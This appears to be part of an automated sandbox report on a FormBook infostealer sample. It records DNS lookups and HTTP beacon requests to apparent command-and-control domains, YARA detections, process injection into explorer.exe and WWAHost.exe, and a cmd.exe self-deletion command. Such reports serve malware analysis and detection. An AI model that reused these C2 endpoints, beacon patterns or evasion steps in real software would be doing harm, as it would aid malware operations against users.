                                          Sep 27, 2021 21:06:51.119846106 CEST192.168.2.48.8.8.80xcfe3Standard query (0)www.portale-accessi-anomali.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:01.369004965 CEST192.168.2.48.8.8.80x4e51Standard query (0)www.lottochain.betA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:06.792208910 CEST192.168.2.48.8.8.80x1e46Standard query (0)www.healthcaresms.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:11.835009098 CEST192.168.2.48.8.8.80x7048Standard query (0)www.2377k.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:17.312665939 CEST192.168.2.48.8.8.80xc19aStandard query (0)www.drive16pay.artA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:23.146285057 CEST192.168.2.48.8.8.80xfcd1Standard query (0)www.21lawsofconfidence.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:28.240982056 CEST192.168.2.48.8.8.80xf6d2Standard query (0)www.byemreperde.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:29.255203009 CEST192.168.2.48.8.8.80xf6d2Standard query (0)www.byemreperde.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Sep 27, 2021 21:06:25.505198002 CEST8.8.8.8192.168.2.40xaa6bName error (3)www.kxdrstone.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:30.547971010 CEST8.8.8.8192.168.2.40xd5e4No error (0)www.nurhalilah.xyz104.21.11.163A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:30.547971010 CEST8.8.8.8192.168.2.40xd5e4No error (0)www.nurhalilah.xyz172.67.166.108A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:35.699017048 CEST8.8.8.8192.168.2.40xccddNo error (0)www.uscryptomininglaws.comuscryptomininglaws.comCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 21:06:35.699017048 CEST8.8.8.8192.168.2.40xccddNo error (0)uscryptomininglaws.com34.102.136.180A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:40.970762968 CEST8.8.8.8192.168.2.40x924eNo error (0)www.financecreditpro.com5.9.90.226A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:46.097685099 CEST8.8.8.8192.168.2.40xc1cbName error (3)www.smpldebts.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:51.155942917 CEST8.8.8.8192.168.2.40xcfe3Name error (3)www.portale-accessi-anomali.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:01.650717974 CEST8.8.8.8192.168.2.40x4e51No error (0)www.lottochain.betwww215.wixdns.netCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 21:07:01.650717974 CEST8.8.8.8192.168.2.40x4e51No error (0)www215.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 21:07:01.650717974 CEST8.8.8.8192.168.2.40x4e51No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 21:07:01.650717974 CEST8.8.8.8192.168.2.40x4e51No error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 21:07:01.650717974 CEST8.8.8.8192.168.2.40x4e51No error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:06.828392029 CEST8.8.8.8192.168.2.40x1e46Name error (3)www.healthcaresms.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:11.863893032 CEST8.8.8.8192.168.2.40x7048No error (0)www.2377k.com172.67.148.98A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:11.863893032 CEST8.8.8.8192.168.2.40x7048No error (0)www.2377k.com104.21.95.204A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:17.348882914 CEST8.8.8.8192.168.2.40xc19aNo error (0)www.drive16pay.art202.165.66.108A (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:23.229141951 CEST8.8.8.8192.168.2.40xfcd1Name error (3)www.21lawsofconfidence.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:07:29.344136953 CEST8.8.8.8192.168.2.40xf6d2Server failure (2)www.byemreperde.comnonenoneA (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.nurhalilah.xyz
                                          • www.uscryptomininglaws.com
                                          • www.financecreditpro.com
                                          • www.lottochain.bet
                                          • www.2377k.com
                                          • www.drive16pay.art

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.449828104.21.11.16380C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 21:06:30.575259924 CEST6368OUTGET /r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00 HTTP/1.1
                                          Host: www.nurhalilah.xyz
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:06:30.639205933 CEST6369INHTTP/1.1 301 Moved Permanently
                                          Date: Mon, 27 Sep 2021 19:06:30 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          location: http://nurhalilah.xyz/r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ejOSNG8T2aT1OBl7nSpcHjNMnlNv3fyuC2y9V2YU1Ybr7aR%2F8NvfA%2B3bKRAZJYtqSa7OoxuMXeGni7nL01h13aZ6eWXQ%2B92UBKeF5EjJ5o5SPVrRZiHWjsRCX0crUEqGXOshnxA%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 695702752fad05e9-FRA
                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                          Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                          Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.44982934.102.136.18080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 21:06:35.714364052 CEST6370OUTGET /r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00 HTTP/1.1
                                          Host: www.uscryptomininglaws.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:06:35.892570972 CEST6370INHTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Mon, 27 Sep 2021 19:06:35 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "6151bfae-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.4498395.9.90.22680C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 21:06:40.999752998 CEST6391OUTGET /r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00 HTTP/1.1
                                          Host: www.financecreditpro.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:06:41.026473045 CEST6393INHTTP/1.1 301 Moved Permanently
                                          Server: nginx/1.20.1
                                          Date: Mon, 27 Sep 2021 19:06:41 GMT
                                          Content-Type: text/html
                                          Content-Length: 169
                                          Connection: close
                                          Location: http://financecreditpro.com/r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00
                                          Strict-Transport-Security: max-age=31536000
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.44984935.246.6.10980C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 21:07:01.684684992 CEST6415OUTGET /r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00 HTTP/1.1
                                          Host: www.lottochain.bet
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:07:01.767618895 CEST6416INHTTP/1.1 301 Moved Permanently
                                          Date: Mon, 27 Sep 2021 19:07:01 GMT
                                          Content-Length: 0
                                          Connection: close
                                          location: https://www.lottochain.bet/r95e?5jTDyZ=TgnCaJJuD0kHzauLDq%2FdXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00
                                          strict-transport-security: max-age=120
                                          x-wix-request-id: 1632769621.701204728676110080
                                          Age: 0
                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                          X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVi7JwZOAS6ilH0jZpKLTjKF,qquldgcFrj2n046g4RNSVHgoSL3TVJh4IE7YwTXHesA=,2d58ifebGbosy5xc+FRalqCg7GVJ0AblbBa19E7yp9/Jevmsc5dw521bQk+YVUcMC5pgEgJzARPPe1194hBnp8TkJSrzujHds9w7kmIwT90=,2UNV7KOq4oGjA5+PKsX47IJCkNcL1UXXT2AxlbYijuBYgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,LXlT8qjS5x6WBejJA3+gBeGvZbATxKf3YHVGfwvvgmSTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,UvY1uiXtmgas6aI2l+unv1BiX1kNVdl/4TGIg4ZwPbq2MDV1s43JGm4rKGF0jsK6iy9RDN50yNDYuMRjpFglRg==
                                          Cache-Control: no-cache
                                          X-Content-Type-Options: nosniff
                                          Server: Pepyaka/1.19.10


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          4192.168.2.449862172.67.148.9880C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 21:07:11.884968996 CEST6458OUTGET /r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00 HTTP/1.1
                                          Host: www.2377k.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:07:12.270593882 CEST6459INHTTP/1.1 404 Not Found
                                          Date: Mon, 27 Sep 2021 19:07:12 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          vary: Accept-Encoding
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L1%2Fcb9sF0iYG9tLZL%2BCND7WWwL50k6FpCO6GkNPjTY8HledrDzcbyuzJAJs%2BC3yUD5GaZvDIhbwwTZOsvt8Qf3jJY5JuckW7ioIU2oZopXGVv5Lg9KbGsLMIggxHDd9g"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 6957037758895c14-FRA
                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                          Data Raw: 31 63 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20
                                          Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          5192.168.2.449863202.165.66.10880C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 21:07:17.622366905 CEST6467OUTGET /r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00 HTTP/1.1
                                          Host: www.drive16pay.art
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 21:07:18.216249943 CEST6467INHTTP/1.1 404 Not Found
                                          Server: nginx/1.21.0
                                          Date: Mon, 27 Sep 2021 19:07:18 GMT
                                          Content-Type: application/json; charset=utf-8
                                          Content-Length: 167
                                          Connection: close
                                          X-Powered-By: Express
                                          ETag: W/"a7-WoatyhJzGlRwwZ9faPbF6C/DR18"
                                          Data Raw: 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 43 61 6e 6e 6f 74 20 47 45 54 20 2f 63 6c 69 63 6b 2f 70 72 6f 78 79 6a 73 2f 72 39 35 65 2f 3f 35 6a 54 44 79 5a 3d 68 6c 4e 43 62 39 46 4a 43 63 6e 77 73 65 45 70 44 79 63 4f 56 68 79 6e 55 4d 54 2b 6d 4d 75 6c 6e 32 73 43 69 44 2b 48 48 41 47 4d 68 74 39 36 4b 35 7a 69 77 38 4b 5a 34 55 33 38 39 55 66 43 57 58 64 4d 26 6c 32 4d 3d 54 4c 30 30 22 7d
                                          Data Ascii: {"statusCode":404,"error":"Not Found","message":"Cannot GET /click/proxyjs/r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00"}


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: DN_467842234567.exe PID: 1088 Parent PID: 6556

                                          General

                                          Start time:21:05:17
                                          Start date:27/09/2021
                                          Path:C:\Users\user\Desktop\DN_467842234567.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\DN_467842234567.exe'
                                          Imagebase:0x400000
                                          File size:259211 bytes
                                          MD5 hash:C16013EA29F9DD1525DCB65C2184784E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Analysis Process: DN_467842234567.exe PID: 6416 Parent PID: 1088

                                          General

                                          Start time:21:05:18
                                          Start date:27/09/2021
                                          Path:C:\Users\user\Desktop\DN_467842234567.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\DN_467842234567.exe'
                                          Imagebase:0x400000
                                          File size:259211 bytes
                                          MD5 hash:C16013EA29F9DD1525DCB65C2184784E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Analysis Process: explorer.exe PID: 3424 Parent PID: 6416

                                          General

                                          Start time:21:05:22
                                          Start date:27/09/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff6fee60000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          Analysis Process: WWAHost.exe PID: 4388 Parent PID: 3424

                                          General

                                          Start time:21:05:44
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\WWAHost.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                          Imagebase:0x10d0000
                                          File size:829856 bytes
                                          MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          Analysis Process: cmd.exe PID: 5492 Parent PID: 4388

                                          General

                                          Start time:21:05:49
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\DN_467842234567.exe'
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: conhost.exe PID: 5180 Parent PID: 5492

                                          General

                                          Start time:21:05:50
                                          Start date:27/09/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >